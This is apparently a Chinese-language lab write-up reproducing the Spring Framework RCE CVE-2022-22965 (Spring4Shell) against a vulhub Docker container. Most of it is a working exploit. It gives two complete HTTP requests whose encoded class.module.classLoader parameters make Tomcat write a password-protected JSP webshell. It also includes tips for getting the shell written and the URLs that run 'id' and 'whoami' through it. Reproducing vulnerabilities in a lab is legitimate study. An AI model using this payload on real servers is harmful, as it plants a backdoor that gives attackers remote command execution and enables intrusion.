Spring Framework RCE简单复现(CVE-2022-22965)

漏洞复现
, ,

Spring Framework RCE简单复现(CVE-2022-22965)

环境搭建

下载地址:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965

拉取镜像:docker pull vulhub/spring-webmvc:5.3.17

启动:docker run -p 18080:8080 -d vulhub/spring-webmvc:5.3.17

访问页面

image

在bp访问的效果

image

payload1攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.88.104:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Cookie: experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqWXhaVFEyWldRM0xURmxOelV0TkRjek15MWhPRE0wTFRneVltUmpaREF3T1RZME1pST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--647e08d3a6c45cf8c02e7a542cc7a85b8006566a; JSESSIONID=7A7EBF053C4EB86DCEC2FE868DFBE92E
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


image

踩坑1:每次写完shell会有缓存,如果发现没重复打payload没写成,就重启一下tomcat服务就好了。

踩坑2:下面的请求头,一定要夹在里面,不然不会请求到里面,写的马就会不对

payload2攻击

1
2
3
4
5
6
7
/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


suffix: %>//
c1: Runtime
c2: <%
DNT: 1

最后访问执行webshell

http://192.168.88.104:18080//tomcatwar.jsp?pwd=j&cmd=id

image

http://192.168.88.104:18080//tomcatwar.jsp?pwd=j&cmd=whoami

image